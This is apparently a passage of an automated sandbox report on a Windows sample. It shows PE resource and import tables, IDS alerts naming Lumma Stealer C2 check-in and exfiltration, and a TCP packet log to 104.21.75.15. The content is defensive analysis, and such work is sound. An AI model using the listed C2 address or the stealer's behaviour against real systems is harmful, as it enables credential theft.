                                                                            RT_GROUP_ICON0x3e02500x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e02900x3edataEnglishUnited States0.8387096774193549
                                                                            RT_GROUP_ICON0x3e02d00x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e03100x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e03500x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e03900x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e03d00x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e04100x3edataEnglishUnited States0.8870967741935484
                                                                            RT_VERSION0x3e04500x17cdataEnglishUnited States0.5684210526315789
                                                                            RT_MANIFEST0x3e05cc0x2e9XML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.4993288590604027
                                                                            DLLImport
                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                            user32.dllCharNextW, LoadStringW
                                                                            kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, SetCurrentDirectoryW, GetCurrentDirectoryW, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
                                                                            kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                                            user32.dllSetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWinEvent, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWinEventHook, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemRect, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetComboBoxInfo, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIconIndirect, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, BeginDeferWindowPos, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                            gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWorldTransform, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetGraphicsMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetCurrentObject, GetClipBox, GetBrushOrgEx, GetBkMode, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                                                                            version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                            kernel32.dlllstrcmpW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, WaitForMultipleObjects, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetPriorityClass, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MultiByteToWideChar, MulDiv, MoveFileW, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalMemoryStatus, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetShortPathNameW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetComputerNameW, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DosDateTimeToFileTime, DeleteFileW, DeleteCriticalSection, CreateThread, CreateSemaphoreW, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CloseHandle
                                                                            advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey, GetUserNameW
                                                                            SHFolder.dllSHGetFolderPathW
                                                                            kernel32.dllSleep
                                                                            netapi32.dllNetWkstaGetInfo
                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                            oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                            comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                            user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                                                            msvcrt.dllisxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strlen, strncmp, memset, memcpy, memcmp
                                                                            shell32.dllSHGetFileInfoW, ShellExecuteW, Shell_NotifyIconW
                                                                            wininet.dllInternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                            shell32.dllSHGetFolderPathW, SHGetSpecialFolderPathW, SHGetPathFromIDListW, SHGetDesktopFolder
                                                                            winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                                                                            winspool.drvGetDefaultPrinterW
                                                                            NameOrdinalAddress
                                                                            TMethodImplementationIntercept20x46451c
                                                                            dbkFCallWrapperAddr10x721c5c
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-15T16:00:24.847971+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.75.15443TCP
                                                                            2025-01-15T16:00:25.414691+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.75.15443TCP
                                                                            2025-01-15T16:00:25.414691+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.75.15443TCP
                                                                            2025-01-15T16:00:25.936479+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.75.15443TCP
                                                                            2025-01-15T16:00:26.445797+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.75.15443TCP
                                                                            2025-01-15T16:00:26.445797+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.75.15443TCP
                                                                            2025-01-15T16:00:27.348911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.75.15443TCP
                                                                            2025-01-15T16:00:28.931914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.75.15443TCP
                                                                            2025-01-15T16:00:30.837224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.75.15443TCP
                                                                            2025-01-15T16:00:32.588655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.75.15443TCP
                                                                            2025-01-15T16:00:33.116234+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741104.21.75.15443TCP
                                                                            2025-01-15T16:00:34.421280+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.75.15443TCP
                                                                            2025-01-15T16:00:36.208851+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.75.15443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 15, 2025 16:00:24.314404964 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.314451933 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:24.314538002 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.340953112 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.340971947 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:24.847775936 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:24.847970963 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.853384972 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.853396893 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:24.853693962 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:24.896075010 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.999063969 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.999106884 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:24.999239922 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.414693117 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.414788961 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.414904118 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.432760000 CET49730443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.432799101 CET44349730104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.450400114 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.450448990 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.450546980 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.451437950 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.451452017 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.936301947 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.936479092 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.938179016 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.938208103 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.938498974 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:25.940035105 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.940073013 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:25.940140963 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.445779085 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.445830107 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.445871115 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.445894957 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.445929050 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.445920944 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.445976019 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446000099 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.446017027 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.446022034 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446034908 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446079016 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.446089029 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446234941 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446274996 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446278095 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.446286917 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.446326971 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.450351954 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.489845991 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.539154053 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.539261103 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.539336920 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.539372921 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.539393902 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.539442062 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.539578915 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.539593935 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.539608002 CET49731443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.539614916 CET44349731104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.843839884 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.843883991 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:26.843955040 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.844322920 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:26.844335079 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:27.348839045 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:27.348911047 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:27.350403070 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:27.350418091 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:27.350651979 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:27.352061987 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:27.352251053 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:27.352277994 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:27.352333069 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:27.352341890 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.239523888 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.239634991 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.239892960 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.240056038 CET49732443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.240080118 CET44349732104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.432362080 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.432425022 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.432668924 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.433001995 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.433018923 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.931799889 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.931914091 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.934040070 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.934053898 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.934395075 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:28.936141968 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.936378956 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:28.936412096 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:29.710129976 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:29.710258961 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:29.710305929 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:29.710441113 CET49734443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:29.710464001 CET44349734104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.315380096 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.315438032 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.315502882 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.316034079 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.316051006 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.837142944 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.837224007 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.838898897 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.838927031 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.839215040 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.848427057 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.848567009 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.848620892 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:30.848694086 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:30.848710060 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:31.657031059 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:31.657151937 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:31.657206059 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:31.657282114 CET49739443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:31.657303095 CET44349739104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:32.093009949 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.093074083 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:32.093199968 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.093547106 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.093561888 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:32.588531971 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:32.588654995 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.589922905 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.589942932 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:32.590244055 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:32.598501921 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.598596096 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:32.598607063 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:33.116240978 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:33.116399050 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:33.116501093 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:33.116663933 CET49741443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:33.116689920 CET44349741104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:33.931654930 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:33.931756020 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:33.931880951 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:33.932185888 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:33.932205915 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.421163082 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.421279907 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.422616005 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.422643900 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.422924042 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.424267054 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425034046 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425081015 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.425190926 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425230980 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.425357103 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425389051 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.425534010 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425564051 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.425724030 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425757885 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.425946951 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.425987005 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.426001072 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.426153898 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.426192045 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.435127020 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.435347080 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.435404062 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.435441017 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.435468912 CET44349742104.21.75.15192.168.2.4
